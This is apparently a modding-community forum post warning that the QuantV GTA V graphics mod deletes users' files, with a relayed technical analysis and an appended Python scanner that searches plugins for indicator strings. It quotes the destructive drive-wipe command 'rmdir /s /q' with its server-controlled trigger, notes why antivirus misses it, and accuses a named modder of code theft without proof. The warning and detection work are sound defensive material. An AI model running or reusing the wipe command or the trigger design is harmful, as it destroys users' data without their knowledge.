
BE AWARE OF THE QUANTV GRAPHICAL MOD!

Launcher Leaks

Yesterday our members brought to our attention that QuantV was deleting members' game files, which we are now guessing was the .asi included for the base game folder, which would delete your game files once executed.

Quant has a long history of doing shady stuff, which also includes stealing and not using original code for his graphics pack: ripping RDR2's clouds and placing them in GTAV, and stealing from RazedMods' NVE; at one point his graphical pack had filenames identical to NVE's files.

Quant should not be trusted, as he's installing basically malware onto people's computers without notice or a warning, which is a real invasion, especially without the user's knowledge.

NVE is a safer option; although we don't allow downloads for it here, it can be found elsewhere, or support RazedMods' Patreon to get access.

Factual information (via Rage Forums)

  • Both enbhelper.dll and QuantV.asi contain the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different.
  • It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
  • Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
  • There is no sign of this version of the .asi executing any other commands than this rmdir chain.
  • Similarly, there’s no sign of other persistence methods, though there are some file reads/writes, and it may be the case that the .asi will edit some .ini files in the enbseries folder to ‘worm’ in case a pirated copy is spread further.
  • The ‘check’ is done using an HTTP API located at http://quantv.xyz/updater, the details of which have not been investigated at this time, presumably with a POST request of code=..., involving the Desaturate Radius= value in enbseries/enbeffect.fx.ini, which is actually a unique user ID.
  • The library cpp-httplib is used, with httplib:: renamed to enb::. The main ‘trigger’ is this API returning (or not returning) true.
  • The command executed amounts to system(("rmdir /s /q " + drive_letter).c_str());. This will remove files that the user has access to read/write, which could be a lot.
  • There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.
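As an added example (not part of the original post or the Rage Forums analysis), here is a defender-side triage script in Python that searches .asi/.dll plugins for the indicator strings listed above, in both ASCII and UTF-16LE form since Windows binaries often store wide strings; the weights, the file extensions and the sample bytes are assumptions.

```python
from pathlib import Path

# Indicators quoted from the analysis above; the weights are an assumed triage ranking.
INDICATORS = {
    b"rmdir /s /q": 5,        # the destructive command chain
    b"quantv.xyz/updater": 3, # the HTTP 'check' endpoint
    b"enb::": 1,              # cpp-httplib namespace renamed to enb::
    b"Desaturate Radius": 1,  # ini key (ab)used as a unique user ID
}

def encodings(s: bytes):
    """Yield the ASCII form and the UTF-16LE form (Windows wide string) of an indicator."""
    yield s
    yield s.decode("ascii").encode("utf-16-le")

def scan_bytes(data: bytes) -> dict:
    """Return {indicator: hit_count} for every indicator present in data."""
    hits = {}
    for ind in INDICATORS:
        n = sum(data.count(enc) for enc in encodings(ind))
        if n:
            hits[ind.decode()] = n
    return hits

def risk_score(hits: dict) -> int:
    """Sum the weights of the indicators that were found."""
    return sum(INDICATORS[k.encode()] for k in hits)

def scan_dir(root: str, exts=(".asi", ".dll")) -> list:
    """Scan mod plugins under root; return (path, score, hits) sorted by score, highest first."""
    results = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_bytes(p.read_bytes())
            if hits:
                results.append((str(p), risk_score(hits), hits))
    return sorted(results, key=lambda r: -r[1])

# Constructed sample mimicking the strings described above (not a real binary).
SAMPLE = (b"\x00" * 16 + b"rmdir /s /q " + b"\x00" * 4
          + "http://quantv.xyz/updater".encode("utf-16-le")
          + b"enb::Client\x00")

if __name__ == "__main__":
    hits = scan_bytes(SAMPLE)
    print(hits, risk_score(hits))
```

Point scan_dir() at your GTAV plugin or enbseries folder; a hit on the rmdir string alone is reason enough to quarantine the file for closer analysis rather than run the game.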